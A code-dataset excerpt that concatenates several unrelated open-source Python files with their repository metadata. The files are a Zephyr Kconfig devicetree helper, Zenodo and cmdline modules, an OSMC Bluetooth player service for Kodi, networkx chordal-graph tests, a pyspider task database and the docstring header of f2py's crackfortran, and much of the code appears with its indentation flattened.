'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
node = edt.chosen_node(chosen)
return _node_reg_size(node, index, unit)
def dt_chosen_reg(kconf, name, chosen, index=0, unit=None):
"""
This function just routes to the proper function and converts
the result to either a string int or string hex value.
"""
if name == "dt_chosen_reg_size_int":
return str(_dt_chosen_reg_size(kconf, chosen, index, unit))
if name == "dt_chosen_reg_size_hex":
return hex(_dt_chosen_reg_size(kconf, chosen, index, unit))
if name == "dt_chosen_reg_addr_int":
return str(_dt_chosen_reg_addr(kconf, chosen, index, unit))
if name == "dt_chosen_reg_addr_hex":
return hex(_dt_chosen_reg_addr(kconf, chosen, index, unit))
def _dt_node_reg_addr(kconf, path, index=0, unit=None):
"""
This function takes a 'path' and looks for an EDT node at that path. If it
finds an EDT node, it will look to see if that node has a register at the
given 'index' and return the address value of that reg, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
try:
node = edt.get_node(path)
except edtlib.EDTError:
return 0
return _node_reg_addr(node, index, unit)
def _dt_node_reg_size(kconf, path, index=0, unit=None):
"""
This function takes a 'path' and looks for an EDT node at that path. If it
finds an EDT node, it will look to see if that node has a register at the
given 'index' and return the size value of that reg, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
try:
node = edt.get_node(path)
except edtlib.EDTError:
return 0
return _node_reg_size(node, index, unit)
def dt_node_reg(kconf, name, path, index=0, unit=None):
"""
This function just routes to the proper function and converts
the result to either a string int or string hex value.
"""
if name == "dt_node_reg_size_int":
return str(_dt_node_reg_size(kconf, path, index, unit))
if name == "dt_node_reg_size_hex":
return hex(_dt_node_reg_size(kconf, path, index, unit))
if name == "dt_node_reg_addr_int":
return str(_dt_node_reg_addr(kconf, path, index, unit))
if name == "dt_node_reg_addr_hex":
return hex(_dt_node_reg_addr(kconf, path, index, unit))
def dt_node_has_bool_prop(kconf, _, path, prop):
"""
This function takes a 'path' and looks for an EDT node at that path. If it
finds an EDT node, it will look to see if that node has a boolean property
by the name of 'prop'. If the 'prop' exists it will return "y" otherwise
we return "n".
"""
if doc_mode or edt is None:
return "n"
try:
node = edt.get_node(path)
except edtlib.EDTError:
return "n"
if prop not in node.props:
return "n"
if node.props[prop].type != "boolean":
return "n"
if node.props[prop].val:
return "y"
return "n"
def dt_node_has_prop(kconf, _, label, prop):
"""
This function takes a 'label' and looks for an EDT node for that label. If
it finds an EDT node, it will look to see if that node has a property
by the name of 'prop'. If the 'prop' exists it will return "y" otherwise
we return "n".
"""
if doc_mode or edt is None:
return "n"
try:
node = edt.label2node.get(label)
except edtlib.EDTError:
return "n"
if node is None:
return "n"
if prop in node.props:
return "y"
return "n"
def dt_node_int_prop(kconf, name, path, prop, unit=None):
"""
This function takes a 'path' and property name ('prop') looks for an EDT
node at that path. If it finds an EDT node, it will look to see if that
node has a property called 'prop' and if that 'prop' is an integer type
will return the value of the property 'prop' as either a string int or
string hex value, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return "0"
try:
node = edt.get_node(path)
except edtlib.EDTError:
return "0"
if name == "dt_node_int_prop_int":
return str(_node_int_prop(node, prop, unit))
if name == "dt_node_int_prop_hex":
return hex(_node_int_prop(node, prop, unit))
def dt_node_str_prop_equals(kconf, _, path, prop, val):
"""
This function takes a 'path' and property name ('prop') looks for an EDT
node at that path. If it finds an EDT node, it will look to see if that
node has a property 'prop' of type string. If that 'prop' is equal to 'val'
it will return "y" otherwise return "n".
"""
if doc_mode or edt is None:
return "n"
try:
node = edt.get_node(path)
except edtlib.EDTError:
return "n"
if prop not in node.props:
return "n"
if node.props[prop].type != "string":
return "n"
if node.props[prop].val == val:
return "y"
return "n"
def dt_compat_enabled(kconf, _, compat):
"""
This function takes a 'compat' and returns "y" if we find a status "okay"
compatible node in the EDT otherwise we return "n"
"""
if doc_mode or edt is None:
return "n"
return "y" if compat in edt.compat2okay else "n"
def dt_compat_on_bus(kconf, _, compat, bus):
"""
This function takes a 'compat' and returns "y" if we find an "enabled"
compatible node in the EDT which is on bus 'bus'. It returns "n" otherwise.
"""
if doc_mode or edt is None:
return "n"
if compat in edt.compat2okay:
for node in edt.compat2okay[compat]:
if node.on_bus is not None and node.on_bus == bus:
return "y"
return "n"
def dt_nodelabel_has_compat(kconf, _, label, compat):
"""
This function takes a 'label' and returns "y" if an "enabled" node with
such label can be found in the EDT and that node is compatible with the
provided 'compat', otherwise it returns "n".
"""
if doc_mode or edt is None:
return "n"
if compat in edt.compat2okay:
for node in edt.compat2okay[compat]:
if label in node.labels:
return "y"
return "n"
def dt_nodelabel_path(kconf, _, label):
"""
This function takes a node label (not a label property) and
returns the path to the node which has that label, or an empty
string if there is no such node.
"""
if doc_mode or edt is None:
return ""
node = edt.label2node.get(label)
return node.path if node else ""
def shields_list_contains(kconf, _, shield):
"""
Return "n" if cmake environment variable 'SHIELD_AS_LIST' doesn't exist.
Return "y" if 'shield' is present list obtained after 'SHIELD_AS_LIST'
has been split using ";" as a separator and "n" otherwise.
"""
    try:
        shields = os.environ['SHIELD_AS_LIST']
    except KeyError:
        return "n"
    return "y" if shield in shields.split(";") else "n"
# Keys in this dict are the function names as they appear
# in Kconfig files. The values are tuples in this form:
#
# (python_function, minimum_number_of_args, maximum_number_of_args)
#
# Each python function is given a kconf object and its name in the
# Kconfig file, followed by arguments from the Kconfig file.
#
# See the kconfiglib documentation for more details.
functions = {
"dt_compat_enabled": (dt_compat_enabled, 1, 1),
"dt_compat_on_bus": (dt_compat_on_bus, 2, 2),
"dt_chosen_label": (dt_chosen_label, 1, 1),
"dt_chosen_enabled": (dt_chosen_enabled, 1, 1),
"dt_chosen_path": (dt_chosen_path, 1, 1),
"dt_path_enabled": (dt_node_enabled, 1, 1),
"dt_alias_enabled": (dt_node_enabled, 1, 1),
"dt_nodelabel_enabled": (dt_nodelabel_enabled, 1, 1),
"dt_chosen_reg_addr_int": (dt_chosen_reg, 1, 3),
"dt_chosen_reg_addr_hex": (dt_chosen_reg, 1, 3),
"dt_chosen_reg_size_int": (dt_chosen_reg, 1, 3),
"dt_chosen_reg_size_hex": (dt_chosen_reg, 1, 3),
"dt_node_reg_addr_int": (dt_node_reg, 1, 3),
"dt_node_reg_addr_hex": (dt_node_reg, 1, 3),
"dt_node_reg_size_int": (dt_node_reg, 1, 3),
"dt_node_reg_size_hex": (dt_node_reg, 1, 3),
"dt_node_has_bool_prop": (dt_node_has_bool_prop, 2, 2),
"dt_node_has_prop": (dt_node_has_prop, 2, 2),
"dt_node_int_prop_int": (dt_node_int_prop, 2, 3),
"dt_node_int_prop_hex": (dt_node_int_prop, 2, 3),
"dt_node_str_prop_equals": (dt_node_str_prop_equals, 3, 3),
"dt_nodelabel_has_compat": (dt_nodelabel_has_compat, 2, 2),
"dt_nodelabel_path": (dt_nodelabel_path, 1, 1),
"shields_list_contains": (shields_list_contains, 1, 1),
}
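# Hedged sketch of the call path (the chosen name and unit are illustrative):
# a Kconfig default such as
#     default $(dt_chosen_reg_size_int,zephyr,sram,0,K)
# makes kconfiglib invoke
#     dt_chosen_reg(kconf, "dt_chosen_reg_size_int", "zephyr,sram", "0", "K")
# which returns the size of the /chosen "zephyr,sram" region in KiB as a
# decimal string.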
|
zephyrproject-rtos/zephyr
|
scripts/kconfig/kconfigfunctions.py
|
Python
|
apache-2.0
| 15,611
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron. Copyright Yannick Buron
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import res_config
|
codoo/vertical-exchange
|
base_exchange/__init__.py
|
Python
|
agpl-3.0
| 949
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with XBMC; see the file COPYING. If not, write to
the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
http://www.gnu.org/copyleft/gpl.html
'''
import time
import xbmc
import xbmcaddon
import signal
import dbus
import dbus.service
import dbus.mainloop.glib
import gobject
import threading
import json
SERVICE_NAME = "org.bluez"
AGENT_IFACE = SERVICE_NAME + '.Agent1'
ADAPTER_IFACE = SERVICE_NAME + ".Adapter1"
DEVICE_IFACE = SERVICE_NAME + ".Device1"
PLAYER_IFACE = SERVICE_NAME + '.MediaPlayer1'
TRANSPORT_IFACE = SERVICE_NAME + '.MediaTransport1'
__addon__ = xbmcaddon.Addon()
__addonversion__ = __addon__.getAddonInfo('version')
__addonid__ = __addon__.getAddonInfo('id')
__addonname__ = __addon__.getAddonInfo('name')
def log(txt):
message = '%s: %s' % (__addonname__, str(txt).encode('ascii', 'ignore'))
xbmc.log(msg=message, level=xbmc.LOGDEBUG)
class BTPlayer(threading.Thread):
bus = None
mainloop = None
device = None
deviceAlias = None
player = None
transport = None
connected = None
state = None
status = None
def __init__(self):
"""Specify a signal handler, and find any connected media players"""
super(BTPlayer, self).__init__()
self.bus = dbus.SystemBus()
self.bus.add_signal_receiver(self.playerHandler,
bus_name="org.bluez",
dbus_interface="org.freedesktop.DBus.Properties",
signal_name="PropertiesChanged",
path_keyword="path")
self.findPlayer()
def run(self):
"""Start monitoring bluez by running the gobject Mainloop()"""
gobject.threads_init()
self.mainloop = gobject.MainLoop()
self.mainloop.run()
def end(self):
"""Stop the gobject Mainloop()"""
        if self.mainloop:
            self.mainloop.quit()
def findPlayer(self):
"""Find any current media players and associated device"""
manager = dbus.Interface(self.bus.get_object("org.bluez", "/"), "org.freedesktop.DBus.ObjectManager")
objects = manager.GetManagedObjects()
player_path = None
transport_path = None
for path, interfaces in objects.iteritems():
if PLAYER_IFACE in interfaces:
player_path = path
break
if TRANSPORT_IFACE in interfaces:
transport_path = path
if player_path:
self.connected = True
self.getPlayer(player_path)
player_properties = self.player.GetAll(PLAYER_IFACE, dbus_interface="org.freedesktop.DBus.Properties")
if "Status" in player_properties:
self.status = player_properties["Status"]
if "Track" in player_properties:
self.track = player_properties["Track"]
else:
log("Could not find a player")
if transport_path:
self.transport = self.bus.get_object("org.bluez", transport_path)
transport_properties = self.transport.GetAll(TRANSPORT_IFACE, dbus_interface="org.freedesktop.DBus.Properties")
if "State" in transport_properties:
self.state = transport_properties["State"]
def getPlayer(self, path):
"""Get a media player from a dbus path, and the associated device"""
self.player = self.bus.get_object("org.bluez", path)
device_path = self.player.Get("org.bluez.MediaPlayer1", "Device", dbus_interface="org.freedesktop.DBus.Properties")
self.getDevice(device_path)
def getDevice(self, path):
"""Get a device from a dbus path"""
self.device = self.bus.get_object("org.bluez", path)
self.deviceAlias = self.device.Get(DEVICE_IFACE, "Alias", dbus_interface="org.freedesktop.DBus.Properties")
def playerHandler(self, interface, changed, invalidated, path):
"""Handle relevant property change signals"""
iface = interface[interface.rfind(".") + 1:]
player_path = path
if __addon__.getSetting("debug") == "true":
log("Changed : " + str(changed))
log("Interface : " + str(interface))
log("Path : " + str(path))
log("Player Path : " + str(player_path))
if iface == "Device1":
if "Connected" in changed:
self.connected = changed["Connected"]
elif iface == "MediaControl1":
if "Connected" in changed:
self.connected = changed["Connected"]
if changed["Connected"]:
self.findPlayer()
elif iface == "MediaTransport1":
if "State" in changed:
if not changed["State"] == self.state:
self.state = changed["State"]
if not self.state == "active":
xbmc.stopBTPlayer()
elif iface == "MediaPlayer1":
if "Status" in changed:
if not changed["Status"] == self.status:
if changed["Status"] == "playing" and self.state == "active":
                        xbmc.startBTPlayer(player_path)
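    # illustrative signal flow: when the paired phone starts playback, BlueZ
    # emits PropertiesChanged on org.bluez.MediaPlayer1 with
    # {"Status": "playing"}, and the handler above asks Kodi to start the
    # BT player for that dbus path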
def isPlaying(self):
return self.state == "active"
def next(self):
self.player.Next(dbus_interface=PLAYER_IFACE)
def previous(self):
self.player.Previous(dbus_interface=PLAYER_IFACE)
def play(self):
self.player.Play(dbus_interface=PLAYER_IFACE)
def stop(self):
self.player.Stop(dbus_interface=PLAYER_IFACE)
        self.receivedPosition = None
def pause(self):
self.player.Pause(dbus_interface=PLAYER_IFACE)
    def volumeUp(self):
        # no AVRCP control interface is ever set up in this file, so volume
        # is adjusted through the media transport only
        self.transport.VolumeUp(dbus_interface=TRANSPORT_IFACE)
    def volumeDown(self):
        self.transport.VolumeDown(dbus_interface=TRANSPORT_IFACE)
def startBTPlayer(self, macAddress):
if "playing" in self.status:
if xbmc.isBTPlayerActive() == 0:
log("Start BTPlayer")
xbmc.startBTPlayer(macAddress)
class BTPlayerMonitor(xbmc.Player):
btPlayer = None
def __init__( self, *args, **kwargs ):
log("BTPlayerMonitor Started")
def setBtPlayer(self, btPlayer):
self.btPlayer = btPlayer
def onPlayBackStopped(self):
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
self.btPlayer.stop()
def onPlayBackPaused(self):
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
self.btPlayer.pause()
def onPlayBackResumed(self):
if xbmc.isBTPlayerActive() and self.btPlayer.player:
self.btPlayer.play()
def onNextItem(self):
if __addon__.getSetting("debug") == "true":
log("Next Item Event Fired")
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
try:
self.btPlayer.next()
except Exception as e:
log("Exception caught trying to request next track: " + str(e))
def onPreviousItem(self):
if __addon__.getSetting("debug") == "true":
log("Previous Item Event Fired")
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
try:
self.btPlayer.previous()
except Exception as e:
log("Exception caught trying to request previous track: " + str(e))
if __name__ == "__main__":
if __addon__.getSetting("enabled") == "true":
log("BTPlayer Starting")
try:
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
btPlayer = BTPlayer()
btPlayer.start()
btPlayerMonitor = BTPlayerMonitor()
btPlayerMonitor.setBtPlayer(btPlayer)
monitor = xbmc.Monitor()
while not monitor.abortRequested():
            # Sleep/wait for abort for 3 seconds
            if monitor.waitForAbort(3):
# Abort was requested while waiting. We should exit
break
except Exception as e:
log("Exception caught - service exiting " + str(e))
finally:
btPlayer.end()
log("BTPlayer ended")
else:
log("BTPlayer disabled in addon settings")
|
diraimondo/osmc
|
package/a2dp-app-osmc/files/usr/share/kodi/addons/service.osmc.btplayer/service.py
|
Python
|
gpl-2.0
| 9,195
|
# -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Sanitized Unicode string field."""
from __future__ import absolute_import, print_function
from marshmallow import fields
from .sanitizedunicode import SanitizedUnicode
class SanitizedUrl(SanitizedUnicode, fields.Url):
"""SanitizedString-based URL field."""
def _deserialize(self, value, attr, data):
"""Deserialize sanitized URL value."""
# Apply SanitizedUnicode first
value = SanitizedUnicode._deserialize(self, value, attr, data)
return fields.Url._deserialize(self, value, attr, data)
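# Hedged usage sketch (schema and field names are illustrative):
#   from marshmallow import Schema
#   class RecordSchema(Schema):
#       homepage = SanitizedUrl()
#   RecordSchema().load({'homepage': u'https://example.org'})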
|
lnielsen/zenodo
|
zenodo/modules/records/serializers/fields/sanitizedurl.py
|
Python
|
gpl-2.0
| 1,506
|
#!/usr/bin/env python
import pytest
import networkx as nx
class TestMCS:
@classmethod
def setup_class(cls):
# simple graph
connected_chordal_G = nx.Graph()
connected_chordal_G.add_edges_from([(1, 2), (1, 3), (2, 3), (2, 4),
(3, 4), (3, 5), (3, 6), (4, 5),
(4, 6), (5, 6)])
cls.connected_chordal_G = connected_chordal_G
chordal_G = nx.Graph()
chordal_G.add_edges_from([(1, 2), (1, 3), (2, 3), (2, 4), (3, 4),
(3, 5), (3, 6), (4, 5), (4, 6), (5, 6),
(7, 8)])
chordal_G.add_node(9)
cls.chordal_G = chordal_G
non_chordal_G = nx.Graph()
non_chordal_G.add_edges_from([(1, 2), (1, 3), (2, 4), (2, 5),
(3, 4), (3, 5)])
cls.non_chordal_G = non_chordal_G
def test_is_chordal(self):
assert not nx.is_chordal(self.non_chordal_G)
assert nx.is_chordal(self.chordal_G)
assert nx.is_chordal(self.connected_chordal_G)
assert nx.is_chordal(nx.complete_graph(3))
assert nx.is_chordal(nx.cycle_graph(3))
assert not nx.is_chordal(nx.cycle_graph(5))
def test_induced_nodes(self):
G = nx.generators.classic.path_graph(10)
Induced_nodes = nx.find_induced_nodes(G, 1, 9, 2)
assert Induced_nodes == set([1, 2, 3, 4, 5, 6, 7, 8, 9])
pytest.raises(nx.NetworkXTreewidthBoundExceeded,
nx.find_induced_nodes, G, 1, 9, 1)
Induced_nodes = nx.find_induced_nodes(self.chordal_G, 1, 6)
assert Induced_nodes == set([1, 2, 4, 6])
pytest.raises(nx.NetworkXError,
nx.find_induced_nodes, self.non_chordal_G, 1, 5)
def test_chordal_find_cliques(self):
cliques = set([frozenset([9]), frozenset([7, 8]), frozenset([1, 2, 3]),
frozenset([2, 3, 4]), frozenset([3, 4, 5, 6])])
assert nx.chordal_graph_cliques(self.chordal_G) == cliques
def test_chordal_find_cliques_path(self):
G = nx.path_graph(10)
cliqueset = nx.chordal_graph_cliques(G)
for (u, v) in G.edges():
assert (frozenset([u, v]) in cliqueset
or frozenset([v, u]) in cliqueset)
def test_chordal_find_cliquesCC(self):
cliques = set([frozenset([1, 2, 3]), frozenset([2, 3, 4]),
frozenset([3, 4, 5, 6])])
cgc = nx.chordal_graph_cliques
assert cgc(self.connected_chordal_G) == cliques
def test_complete_to_chordal_graph(self):
fgrg = nx.fast_gnp_random_graph
test_graphs = [nx.barbell_graph(6, 2), nx.cycle_graph(15),
nx.wheel_graph(20), nx.grid_graph([10, 4]),
nx.ladder_graph(15), nx.star_graph(5),
nx.bull_graph(), fgrg(20, 0.3, seed=1)]
for G in test_graphs:
H, a = nx.complete_to_chordal_graph(G)
assert nx.is_chordal(H)
assert len(a) == H.number_of_nodes()
if nx.is_chordal(G):
assert G.number_of_edges() == H.number_of_edges()
assert set(a.values()) == {0}
else:
assert len(set(a.values())) == H.number_of_nodes()
|
sserrot/champion_relationships
|
venv/Lib/site-packages/networkx/algorithms/tests/test_chordal.py
|
Python
|
mit
| 3,351
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<roy@binux.me>
# http://binux.me
# Created on 2014-12-04 22:33:43
import re
import six
import time
import json
import sqlalchemy.exc
from sqlalchemy import (create_engine, MetaData, Table, Column, Index,
Integer, String, Float, Text, func)
from sqlalchemy.engine.url import make_url
from pyspider.libs import utils
from pyspider.database.base.taskdb import TaskDB as BaseTaskDB
from .sqlalchemybase import SplitTableMixin, result2dict
class TaskDB(SplitTableMixin, BaseTaskDB):
__tablename__ = ''
def __init__(self, url):
self.table = Table('__tablename__', MetaData(),
Column('taskid', String(64), primary_key=True, nullable=False),
Column('project', String(64)),
Column('url', String(1024)),
Column('status', Integer),
Column('schedule', Text()),
Column('fetch', Text()),
Column('process', Text()),
Column('track', Text()),
Column('lastcrawltime', Float(32)),
Column('updatetime', Float(32)),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
self.url = make_url(url)
if self.url.database:
database = self.url.database
self.url.database = None
try:
engine = create_engine(self.url, convert_unicode=True, pool_recycle=3600)
conn = engine.connect()
conn.execute("commit")
conn.execute("CREATE DATABASE %s" % database)
except sqlalchemy.exc.SQLAlchemyError:
pass
self.url.database = database
self.engine = create_engine(url, convert_unicode=True, pool_recycle=3600)
self._list_project()
def _create_project(self, project):
assert re.match(r'^\w+$', project) is not None
if project in self.projects:
return
self.table.name = self._tablename(project)
Index('status_%s_index' % self.table.name, self.table.c.status)
self.table.create(self.engine, checkfirst=True)
self.table.indexes.clear()
@staticmethod
def _parse(data):
for key, value in list(six.iteritems(data)):
if isinstance(value, six.binary_type):
data[key] = utils.text(value)
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
if data[each]:
data[each] = json.loads(data[each])
else:
data[each] = {}
return data
@staticmethod
def _stringify(data):
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
if data[each]:
data[each] = json.dumps(data[each])
else:
data[each] = json.dumps({})
return data
def load_tasks(self, status, project=None, fields=None):
if project and project not in self.projects:
return
if project:
projects = [project, ]
else:
projects = self.projects
columns = [getattr(self.table.c, f, f) for f in fields] if fields else self.table.c
for project in projects:
self.table.name = self._tablename(project)
for task in self.engine.execute(self.table.select()
.with_only_columns(columns)
.where(self.table.c.status == status)):
yield self._parse(result2dict(columns, task))
def get_task(self, project, taskid, fields=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return None
self.table.name = self._tablename(project)
columns = [getattr(self.table.c, f, f) for f in fields] if fields else self.table.c
for each in self.engine.execute(self.table.select()
.with_only_columns(columns)
.limit(1)
.where(self.table.c.taskid == taskid)):
return self._parse(result2dict(columns, each))
def status_count(self, project):
result = dict()
if project not in self.projects:
self._list_project()
if project not in self.projects:
return result
self.table.name = self._tablename(project)
for status, count in self.engine.execute(
self.table.select()
.with_only_columns((self.table.c.status, func.count(1)))
.group_by(self.table.c.status)):
result[status] = count
return result
def insert(self, project, taskid, obj={}):
if project not in self.projects:
self._list_project()
if project not in self.projects:
self._create_project(project)
self._list_project()
obj = dict(obj)
obj['taskid'] = taskid
obj['project'] = project
obj['updatetime'] = time.time()
self.table.name = self._tablename(project)
return self.engine.execute(self.table.insert()
.values(**self._stringify(obj)))
def update(self, project, taskid, obj={}, **kwargs):
if project not in self.projects:
self._list_project()
if project not in self.projects:
raise LookupError
self.table.name = self._tablename(project)
obj = dict(obj)
obj.update(kwargs)
obj['updatetime'] = time.time()
return self.engine.execute(self.table.update()
.where(self.table.c.taskid == taskid)
.values(**self._stringify(obj)))
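# Hedged usage sketch (the in-memory SQLite URL and project/task names are
# illustrative):
#   taskdb = TaskDB('sqlite://')
#   taskdb.insert('demo', 'task_1',
#                 {'url': 'http://example.com', 'status': 1,
#                  'schedule': {'age': 10}})
#   print(taskdb.get_task('demo', 'task_1'))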
|
wangjun/pyspider
|
pyspider/database/sqlalchemy/taskdb.py
|
Python
|
apache-2.0
| 6,160
|
from __future__ import absolute_import
# setup logging as close to launching the command as possible
from .logconfig import setup_logging
from .command import BaseCommand
from .settings import SettingsParser
settings = SettingsParser.settings
__all__ = ['SettingsParser', 'settings', 'setup_logging']
|
rca/cmdline
|
src/cmdline/__init__.py
|
Python
|
apache-2.0
| 305
|
#!/usr/bin/env python
"""
crackfortran --- read fortran (77,90) code and extract declaration information.
Copyright 1999-2004 Pearu Peterson all rights reserved,
Pearu Peterson <pearu@ioc.ee>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/09/27 07:13:49 $
Pearu Peterson
Usage of crackfortran:
======================
Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename>
-m <module name for f77 routines>,--ignore-contains
Functions: crackfortran, crack2fortran
The following Fortran statements/constructions are supported
(or will be if needed):
block data,byte,call,character,common,complex,contains,data,
dimension,double complex,double precision,end,external,function,
implicit,integer,intent,interface,intrinsic,
logical,module,optional,parameter,private,public,
program,real,(sequence?),subroutine,type,use,virtual,
include,pythonmodule
Note: 'virtual' is mapped to 'dimension'.
Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is a minor bug).
Note: code after 'contains' will be ignored until its scope ends.
Note: 'common' statement is extended: dimensions are moved to variable definitions
Note: f2py directive: <commentchar>f2py<line> is read as <line>
Note: pythonmodule is introduced to represent Python module
Usage:
`postlist=crackfortran(files,funcs)`
`postlist` contains declaration information read from the list of files `files`.
`crack2fortran(postlist)` returns a fortran code to be saved to pyf-file
`postlist` has the following structure:
*** it is a list of dictionaries containing `blocks':
B = {'block','body','vars','parent_block'[,'name','prefix','args','result',
'implicit','externals','interfaced','common','sortvars',
'commonvars','note']}
B['block'] = 'interface' | 'function' | 'subroutine' | 'module' |
'program' | 'block data' | 'type' | 'pythonmodule'
B['body'] --- list containing `subblocks' with the same structure as `blocks'
B['parent_block'] --- dictionary of a parent block:
C['body'][<index>]['parent_block'] is C
B['vars'] --- dictionary of variable definitions
B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first)
B['name'] --- name of the block (not if B['block']=='interface')
B['prefix'] --- prefix string (only if B['block']=='function')
B['args'] --- list of argument names if B['block']== 'function' | 'subroutine'
B['result'] --- name of the return value (only if B['block']=='function')
B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None
B['externals'] --- list of variables being external
B['interfaced'] --- list of variables being external and defined
B['common'] --- dictionary of common blocks (list of objects)
B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions)
B['from'] --- string showing the 'parents' of the current block
B['use'] --- dictionary of modules used in current block:
{<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}}
B['note'] --- list of LaTeX comments on the block
B['f2pyenhancements'] --- optional dictionary
{'threadsafe':'','fortranname':<name>,
'callstatement':<C-expr>|<multi-line block>,
'callprotoargument':<C-expr-list>,
'usercode':<multi-line block>|<list of multi-line blocks>,
'pymethoddef:<multi-line block>'
}
B['entry'] --- dictionary {entryname:argslist,..}
B['varnames'] --- list of variable names given in the order of reading the
Fortran code, useful for derived types.
B['saved_interface'] --- a string of scanned routine signature, defines explicit interface
*** Variable definition is a dictionary
D = B['vars'][<variable name>] =
{'typespec'[,'attrspec','kindselector','charselector','=','typename']}
D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' |
'double precision' | 'integer' | 'logical' | 'real' | 'type'
D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)',
'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)',
'optional','required', etc)
K = D['kindselector'] = {['*','kind']} (only if D['typespec'] =
'complex' | 'integer' | 'logical' | 'real' )
C = D['charselector'] = {['*','len','kind']}
(only if D['typespec']=='character')
D['='] --- initialization expression string
D['typename'] --- name of the type if D['typespec']=='type'
D['dimension'] --- list of dimension bounds
D['intent'] --- list of intent specifications
D['depend'] --- list of variable names on which current variable depends on
D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised
D['note'] --- list of LaTeX comments on the variable
*** Meaning of kind/char selectors (few examples):
        D['typespec']*K['*']
D['typespec'](kind=K['kind'])
character*C['*']
character(len=C['len'],kind=C['kind'])
(see also fortran type declaration statement formats below)
Fortran 90 type declaration statement format (F77 is subset of F90)
====================================================================
(Main source: IBM XL Fortran 5.1 Language Reference Manual)
type declaration = <typespec> [[<attrspec>]::] <entitydecl>
<typespec> = byte |
character[<charselector>] |
complex[<kindselector>] |
double complex |
double precision |
integer[<kindselector>] |
logical[<kindselector>] |
real[<kindselector>] |
type(<typename>)
<charselector> = * <charlen> |
([len=]<len>[,[kind=]<kind>]) |
(kind=<kind>[,len=<len>])
<kindselector> = * <intlen> |
([kind=]<kind>)
<attrspec> = comma separated list of attributes.
Only the following attributes are used in
building up the interface:
external
(parameter --- affects '=' key)
optional
intent
Other attributes are ignored.
<intentspec> = in | out | inout
<arrayspec> = comma separated list of dimension bounds.
<entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>]
[/<init_expr>/ | =<init_expr>] [,<entitydecl>]
In addition, the following attributes are used: check,depend,note
TODO:
* Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)'
-> 'real x(2)')
The above may be solved by creating appropriate preprocessor program, for example.
"""
from __future__ import division, absolute_import, print_function
import sys
import string
import fileinput
import re
import os
import copy
import platform
from . import __version__
# The environment provided by auxfuncs.py is needed for some calls to eval.
# As the needed functions cannot be determined by static inspection of the
# code, it is safest to use import * pending a major refactoring of f2py.
from .auxfuncs import *
f2py_version = __version__.version
# Global flags:
strictf77 = 1 # Ignore `!' comments unless line[0]=='!'
sourcecodeform = 'fix' # 'fix','free'
quiet = 0 # Suppress outmess() output if nonzero.
